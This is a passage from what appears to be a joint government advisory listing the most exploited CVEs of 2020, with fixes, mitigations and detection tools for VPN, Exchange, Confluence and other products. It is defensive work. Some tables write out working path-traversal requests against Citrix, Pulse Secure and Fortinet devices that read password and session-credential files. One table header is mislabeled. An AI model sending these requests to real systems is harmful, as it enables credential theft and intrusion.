patching this vulnerability could have a relative broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set. \n\nAdditionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n\nTables 2\u201314 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. \n\n**Note:** The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE. \n\n\n_Table 2: CVE-2019-19781 Vulnerability Details_\n\n**Citrix Netscaler Directory Traversal (CVE-2019-19781)** \n \n--- \n \n_**Vulnerability Description**_ \nCitrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. \n\n| \n\n_**CVSS 3.02**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (`newbm.pl`) that, when accessed via `HTTP POST` request (`POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl`), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g.,` curl`, `wget`, `Invoke-WebRequest`) and gain unauthorized access to the OS. \n\n_Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n**_Recommended Mitigations_**\n\n * Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781\n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). \n \n_**Detection Methods**_\n\n * CISA has developed a free detection tool for this vulnerability: [cisagov/check-cve-2019-19781](<https://github.com/cisagov/check-cve-2019-19781>): Test a host for susceptibility to CVE-2019-19781.\n * Nmap developed a script that can be used with the port scanning engine: [CVE-2019-19781 - Citrix ADC Path Traversal #1893](<https://github.com/nmap/nmap/pull/1893/files>).\n * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: [Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781>).\n * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n**_Vulnerable Technologies and Versions_** \nCitrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 \n \n_**References and Additional Guidance**_\n\n * [Citrix Blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n * [National Institute for Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)\n * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders ](<https://www.ic3.gov/Media/News/2021/210426.pdf>)\n * [DoJ: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)\n * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_Table 3: CVE 2019-11510 Vulnerability Details_\n\nPulse Secure Connect VPN (CVE 2019-11510) \n--- \n \n_**Vulnerability Description**_ \nPulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials. \n\n| \n\n**CVSS 3.0**\n\nCritical \n \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nImproper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This could lead to anyone connecting to the VPN as a potential target to compromise. \n\n_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n \n_**Recommended Mitigations**_\n\n * Upgrade to the latest Pulse Secure VPN.\n * Stay alert to any scheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read local system files. \n**_Detection Methods_**\n\n * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.\n * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708. \n \n_**Vulnerable Technologies and Versions**_ \nPulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n * [Pulse Security Advisory: SA44101 \u2013 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)\n * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)\n * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [DoJ Press Release: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>) \n \n_Table 4: CVE 2018-13379 Vulnerability Details_\n\n**Fortinet FortioOS Secure Socket Layer VPN (CVE 2018-13379)** \n--- \n \n**_Vulnerability Description_** \nFortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to exact clear-text usernames and passwords. \n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n \n**_Vulnerability Discussion, IOCs, and Malware Campaigns_** \nWeakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform a `HTTP GET request http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results the server responding with unprintable/hex characters alongside cleartext credential information. \n\n_Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo). _\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n \n \n**_Recommended Mitigations_**\n\n * Upgrade to the latest Fortinet SSL VPN. \n * Monitor for alerts to any unscheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read the `sslvpn_websessions` file. \n**_Detection Methods_**\n\n * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709. \n \n**_Vulnerable Technologies and Versions_** \nFortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable. \n \n_**References**_\n\n * [FortiOS System File Leak Through SSL VPN via Specialty Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [Github: Fortinet Ssl Vpn Cve-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)\n * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\n * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) \n \n_Table 5: CVE-2020-5902 Vulnerability Details_\n\nF5 Big IP Traffic Management User Interface (CVE-2020-5902) \n--- \n \n_**Vulnerability Description**_ \nThe Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. \n\n| \n\n_**CVSS 3.0**_ \nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nThis vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. \n\n| _**Fix**_ \n[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>) \n \n \n_**Recommended Mitigations**_ \nDownload and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.\n\n * Address unauthenticated and authenticated attackers on self IPs by blocking all access.\n * Address unauthenticated attackers on management interface by restricting access. \n**_Detection Methods_**\n\n * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>). \n * Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_ \nBIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable. \n \n**_References_**\n\n * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>) \n \n_Table 6: CVE-2020-15505 Vulnerability Details_\n\nMobileIron Core & Connector (CVE-2020-15505) \n--- \n \n_**Vulnerability Description**_\n\nMobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nCVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\nMultiple APTs have been observed exploiting this vulnerability to gain unauthorized access.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * None. Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\nMobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable. \n \n_**References**_\n\n * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)\n * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) \n \n_Table 7: CVE-2020-0688 Vulnerability Details_\n\nMicrosoft Exchange Memory Corruption (CVE-2020-0688) \n--- \n \n_**Vulnerability Description**_\n\nAn RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \nVulnerability Discussion, IOCs, and Malware Campaigns \nCVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install. \n\nA nation-state _APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF%20>) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n_**Vulnerable Technologies and Versions**_\n\nMicrosoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable. \n \n_**References**_\n\n * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)\n * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>) \n \n_Table 8: CVE-2019-3396 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.\n\n| \n\n_**CVSS**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nConfluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.\n\n_Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<Patch%20Available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor-approved resource. \n \n_**Detection Methods**_\n\n * Manually check the software version to see if it is susceptible to this vulnerability.\n\n * CVE-2019-3396 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at [https://github.com/nsacyber/Mitigating-Web-Shells.](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)\n * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)\n * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)\n * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)\n * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>) \n \n_Table 9: CVE 2017-11882 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nMicrosoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the \"Microsoft Office Memory Corruption Vulnerability.\" \n\nCyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nMicrosoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.\n\nData execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.\n\n_Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) \n \n_**Recommended Mitigations**_\n\n * To remediate this issue, administrators should deploy Microsoft\u2019s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.\n * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>). \n \n_**Detection Methods**_\n\n * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\n * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)\n * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)\n * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>) \n \n_Table 10: CVE 2019-11580 Vulnerability Details_\n\nAtlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAttackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_**Recommended Mitigations**_\n\n * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.\n * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.\n * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PD](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)F and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells> \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. \n \n**_References_**\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)\n * [Crowd CWD-5388: Crowd \u2013 pdkinstall Development Plugin Incorrectly Enabled \u2013 CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)\n * [Crowd Security Advisory: Crowd Data Center and Server 4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_Table 11: CVE 2018-7600 Vulnerability Details_\n\nDrupal Core Multiple Remote Code Execution (CVE 2018-7600) \n--- \n \n_**Vulnerability Description**_\n\nDrupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAn RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.\n\n_Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.drupal.org/sa-core-2018-002>) \n \n_**Recommended Mitigations**_\n\n * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1. \n \n_**Detection Methods**_\n\n * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: [https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py.](<https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>) \n \n_**Vulnerable Technologies and Versions**_\n\n * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected. \n \n_**References**_\n\n * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)\n * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)\n * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>) \n \n_Table 12: CVE 2019-18935 Vulnerability Details_\n\nTelerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935) \n--- \n \n_**Vulnerability Description**_\n\nTelerik User Interface (UI) for ASP.NET does not properly filter serialized input for 